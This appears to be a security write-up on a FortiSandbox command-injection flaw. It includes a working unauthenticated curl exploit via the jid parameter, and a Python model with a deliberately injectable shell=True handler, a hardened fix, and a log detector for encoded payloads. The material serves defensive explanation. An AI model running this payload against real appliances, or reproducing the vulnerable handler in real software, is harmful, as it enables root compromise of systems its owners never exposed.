In November 2025, a critical vulnerability was discovered in Fortinet's FortiSandbox that allows an unauthenticated attacker to execute commands on the underlying OS as root. The vulnerability was patched and the advisory was finally made public in April 2026.
The vulnerability affects FortiSandbox versions 4.4.0 through 4.4.8.
Read the full advisory here.
The vulnerability lives in the /fortisandbox/job-detail/tracer-behavior endpoint. The value of the jid GET parameter is interpreted by a shell without sanitization, so OS commands can be injected with the pipe symbol (|): the pipe ends the intended command and starts an attacker-controlled one.
A single curl request is enough to achieve RCE as root with no prior authentication:
curl -s -k --get "http://$HOST/fortisandbox/job-detail/tracer-behavior" --data-urlencode "jid=|(id > /web/ng/out.txt)|"
In this example the output of the injected command (id) is redirected to a file under the web root, /web/ng/out.txt, so that it can be retrieved afterwards with a second request; --data-urlencode takes care of percent-encoding the pipes, parentheses and spaces in the payload.
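To show the vulnerability class behind this PoC and how a defender would look for it, here is an added Python example. It is not Fortinet's code and not from the original write-up: the internal command that receives jid is a hypothetical stand-in (an echo), since the real implementation is not public; the access-log lines are constructed. The vulnerable handler reproduces the pipe injection exactly as the curl above exploits it (command output is not returned in the response, so the payload writes it to a file), the hardened handler shows the fix pattern (whitelist the job id and never go through a shell), and the last function flags suspicious jid values in web access logs.

```python
"""Model of the FortiSandbox tracer-behavior command injection.

Added example, not Fortinet code. The internal command is a hypothetical
stand-in; only the injection behaviour described in the advisory is modelled.
"""
import os
import re
import subprocess
import tempfile
from urllib.parse import parse_qs, urlsplit


def vulnerable_handler(jid: str) -> str:
    """Hypothetical vulnerable handler: jid is interpolated into a shell
    command line and run with shell=True, so every shell metacharacter in
    jid is interpreted by /bin/sh. The stub command stands in for whatever
    internal tool the real endpoint invokes (assumption)."""
    cmd = f"echo 'tracer-behavior job' {jid} '(stub output)'"
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout


def hardened_handler(jid: str) -> str:
    """Fixed pattern: reject anything that is not a plain numeric job id and
    pass the value as a single argv element, never through a shell."""
    if not re.fullmatch(r"[0-9]{1,20}", jid):
        raise ValueError("jid must be a numeric job id")
    proc = subprocess.run(["echo", "tracer-behavior", "job", jid],
                          capture_output=True, text=True)
    return proc.stdout


def demo_injection() -> str:
    """Replays the advisory's payload shape against the vulnerable handler:
    |(id > FILE)| makes the shell run `id` in a subshell and redirect its
    output to a file, mirroring why the PoC writes into the web root.
    Returns the content the injected command left in the file."""
    fd, path = tempfile.mkstemp(prefix="tracer-poc-")
    os.close(fd)
    try:
        vulnerable_handler(f"|(id > {path})|")
        with open(path, encoding="utf-8") as fh:
            return fh.read()
    finally:
        os.unlink(path)


# Shell metacharacters that have no business in a numeric job id.
SHELL_META = re.compile(r"[|;&`$<>()\n]")
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
TARGET_PATH = "/fortisandbox/job-detail/tracer-behavior"


def suspicious_jid_requests(log_lines):
    """Scans combined-format access-log lines and returns (client_ip, jid)
    for requests to the tracer-behavior endpoint whose decoded jid contains
    shell metacharacters. parse_qs percent-decodes the value, so an encoded
    pipe (%7C) is caught just like a literal one."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group(1))
        if not parts.path.endswith(TARGET_PATH):
            continue
        for jid in parse_qs(parts.query, keep_blank_values=True).get("jid", []):
            if SHELL_META.search(jid):
                hits.append((line.split()[0], jid))
    return hits


# Constructed sample log lines (not real traffic): one benign job lookup,
# one carrying the advisory's payload percent-encoded, one unrelated request.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Apr/2026:10:01:02 +0000] "GET /fortisandbox/job-detail/tracer-behavior?jid=1234 HTTP/1.1" 200 512',
    '10.0.0.9 - - [12/Apr/2026:10:01:07 +0000] "GET /fortisandbox/job-detail/tracer-behavior?jid=%7C%28id%20%3E%20%2Fweb%2Fng%2Fout.txt%29%7C HTTP/1.1" 200 0',
    '10.0.0.7 - - [12/Apr/2026:10:01:09 +0000] "GET /fortisandbox/login?next=%2F HTTP/1.1" 200 2048',
]


if __name__ == "__main__":
    print("benign:", vulnerable_handler("1234").strip())
    print("injected id output:", demo_injection().strip())
    print("hardened:", hardened_handler("1234").strip())
    print("log hits:", suspicious_jid_requests(SAMPLE_LOG))
```

The detection deliberately decodes the query before matching: an IDS rule that only looks for a literal `|` in the raw request line misses the percent-encoded form that curl's --data-urlencode sends. On an appliance you would also watch for fresh files appearing under the web root, which is the side effect this PoC relies on.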